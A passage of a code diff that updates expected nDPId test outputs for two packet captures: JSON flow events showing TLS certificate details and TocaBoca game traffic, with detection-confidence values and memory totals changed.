{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578254908457,"flow_last_seen":1578254908475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578254908475,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1885,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +03599{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1578254908457,"flow_last_seen":1578254908490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":5989,"flow_avg_l4_payload_len":544,"midstream":0,"thread_ts_msec":1578254908490,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feodotracker.abuse.ch","server_names":"p2.shared.global.fastly.net,*.12wbt.com,*.2bleacherreport.com,*.3bleacherreport.com,*.4bleacherreport.com,*.8bleacherreport.com,*.abuse.ch,*.acdn-it.ps-pantheon.com,*.cdn.livingmap.com,*.content.plastiq.com,*.dimensions.ai,*.dollarshaveclub.co.uk,*.dollarshaveclub.com,*.dontpayfull.com,*.ebisubook.com,*.foreignaffairs.com,*.fs.jibjab.com,*.fs.unitprints.com,*.ggleap.com,*.goodeggs.com,*.huevosbuenos.com,*.indy.myomnigon.com,*.jwatch.org,*.kingsfordcharcoal.com.au,*.lancenters.com,*.madebywe.com,*.minirodini.com,*.modcloth.net,*.orionlabs.io,*.ps-pantheon.com,*.scodle.com,*.steelseries.com,*.theforeman.org,*.uploads.eversign.com,*.uploads.schoox.com,*.vts.com,*.x.stg1.ebisubook.com,*.yang2020.com,12wbt.com,2bleacherreport.com,3bleacherreport.com,4bleacherreport.com,8bleacherreport.com,abuse.ch,brita.com,cdn.fwupd.org,cdn.livingmap.com,cdn.seated.com,cdn.skillacademy.com,clinicaloptions.com,clorox.com,content-preprod.beaverbrooksweb2.co.uk,content.beaverbrooks.co.uk,content.plastiq.com,coolmathgames.com,copterroyale.coolmathgames.com,d8-dev.coolmathgames.com,deflyio.coolmathgames.com,delivery-api.evadacms.com,dimensions.ai,dollarshaveclub.co.uk,dollarshaveclub.com,dontpayfull.com,eluniverso.com,email.amg-group.co,email.tekoforlife.co.uk,feedmarket.fr,freshstep.com,ggleap.com,goodeggs.com,heap.io,huevosbuenos.com,identity.linuxfoundation.org,joebiden.com,jwatch.org,kingsford.co.nz,kingsfordcharcoal.com.au,lancenters.com,lists.linuxfoundation.org,m-stage.coolmathgames.com,m.coolmathgames.com,madebywe.com,minirodini.com,modcloth.net,orionlabs.io,puritanmedproducts.com,reviews.org,rg-video-staging.ruangguru.com,rg-video.ruangguru.com,ruangguru.com,scodle.com,stage.coolmathgames.com,staging.appblade.com,steelseries.com,stg.platform.eluniverso.com,test.brita.com,test.heap.io,test.joebiden.com,test.ruangguru.com,theforeman.org,video-cdn.quipper.com,videos.calcworkshop.com,vts.com,www.101network.com,www.autos101.com,www.brita.com,www.clorox.com,www.collider.com,www.coolmathgames.com,www.eluniverso.com,www.flinto.com,www.freshstep.com,www.heap.io,www.holagente.com,www.icsydney.com.au,www.joebiden.com,www.kingsford.co.nz,www.mrnatty.com,www.myjewellerystory.com.au,www.myjs.com,www.netacea.com,www.parenting101.com,www.puritanmedproducts.com,www.reviews.org,www.sba.sa,www.shashatcom.sa,www.uat.ontariocolleges.ca,www.vacation101.com,www.walterspeople.co.uk,www.westwayelectricsupply.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=p2.shared.global.fastly.net","alpn":"http\/1.1","fingerprint":"E9:34:DF:E0:C5:31:3C:59:7E:E2:57:44:F2:82:E9:80:F5:5D:05:4B"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1578254908457,"flow_last_seen":1578254908551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":19077,"flow_avg_l4_payload_len":397,"midstream":0,"thread_ts_msec":1578254908551,"l3_proto":"ip4","src_ip":"192.168.1.160","dst_ip":"151.101.66.49","src_port":54804,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":48,"source":"tls_verylong_certificate.pcap","alias":"nDPId-test","packets-captured":48,"packets-processed":48,"total-skipped-flows":0,"total-l4-payload-len":19077,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1578254908551} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 48/48 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6043114 bytes -~~ total memory freed........: 6043114 bytes -~~ total allocations/frees...: 118299/118299 +~~ total memory allocated....: 6176748 bytes +~~ total memory freed........: 6176748 bytes +~~ total allocations/frees...: 121061/121061 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 480 chars ~~ json string max len.......: 3604 chars diff --git a/test/results/toca-boca.pcap.out b/test/results/toca-boca.pcap.out index 1ea6f281b..3033a4325 100644 --- a/test/results/toca-boca.pcap.out +++ b/test/results/toca-boca.pcap.out @@ -2,96 +2,96 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648999646082} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648999646082,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1648999646082,"pkt":"eJS0JASgYDjgxTWgCABFAABUT6gAAD8RuzzAqAJkW8dR4cP9E78AQBEY\/\/8AAQAAAAQitua6Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648999646082,"flow_last_seen":1648999646082,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1648999646082,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648999646116,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1648999646116,"pkt":"YDjgxTWgeJS0JASgCABFAABoMqkAADsR3Cdbx1HhwKgCZBO\/w\/0AVAKWAAAAAn370YUitua6Af8AAAAAABQAAAAAAAAAAQAAAAQD\/wEAAAAALAAAAAC7yASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648999646128,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1648999646128,"pkt":"eJS0JASgYDjgxTWgCABFAABxT6sAAD8RuxzAqAJkW8dR4cP9E78AXV\/iu8gAAgAAADIitua6Af8ABAAAABQAAAAAAAAAAH370YUGAAEEAAAANQAAAAHzAAEIHkEGAwBmMzYxNWExNy02MDg0LTQwYzUtYmZkNS0yZmZiYTRkMQ=="} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":1831,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1649338791869} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1649338791869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649338791869,"pkt":"eJS0JASgYDjgxTWgCABFAABUquwAAD8RF0nAqAJkXCaaMaQmE78AQOkN\/\/8AAQAAAA0lI+N2Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648999646082,"flow_last_seen":1648999648493,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648999646082,"flow_last_seen":1648999648493,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":1831,"flow_avg_l4_payload_len":122,"midstream":0,"thread_ts_msec":1649338791869,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.225","src_port":50173,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1887,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1649339413371} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1649339413371,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1649339413371,"pkt":"eJS0JASgYDjgxTWgCABFAABUVGwAAD8RbcnAqAJkXCaaMdj4E78AQKGB\/\/8AAQAAAA8HHhQ0Av8BBAAAACwAAAABAAAEsAAAgAAAAAACAAAAAAAAAAAAABOIAAAAAgAAAAI="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339413371,"flow_last_seen":1649339413371,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339413371,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":55544,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1649339413394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649339413394,"pkt":"YDjgxTWgeJS0JASgCABFAABojmMAAHkR+b1cJpoxwKgCZBO\/2PgAVKPcAAAAAhCVwDsHHhQ0Af8AAAAAABQAAAAAAAAAAQAAAA8D\/wEAAAAALAAAAAApnASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1649339413406,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":127,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":127,"pkt_l4_len":93,"thread_ts_msec":1649339413406,"pkt":"eJS0JASgYDjgxTWgCABFAABxVHEAAD8RbafAqAJkXCaaMdj4E78AXZgEKZwAAgAAADIHHhQ0Af8AAAAAABQAAAAAAAAAABCVwDsGAAEEAAAANQAAAAHzAAEIHkEEBAAwNmZmN2RmMi0xYWYzLTRmNGMtOTFiOC1mMWE2YzVlZA=="} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339414587,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649338791869,"flow_last_seen":1649338791869,"flow_idle_time":200000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1649339414587,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"92.38.154.49","src_port":42022,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1649339424328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1649339424328,"pkt":"YDjgxTWgeJS0JASgCABFAABojnsAAHkR+aVcJpoxwKgCZBO\/gGMAVCBGAAAAAhCV6uVoVFlOAf8AAAAAABQAAAAAAAAAAQAAABAD\/wEAAAAALAAAAAA0zASwAACAAAAAAAIAAAAAAAAAAAAAE4gAAAACAAAAAg=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649339424328,"flow_last_seen":1649339424328,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1649339424328,"l3_proto":"ip4","src_ip":"92.38.154.49","dst_ip":"192.168.2.100","src_port":5055,"dst_port":32867,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 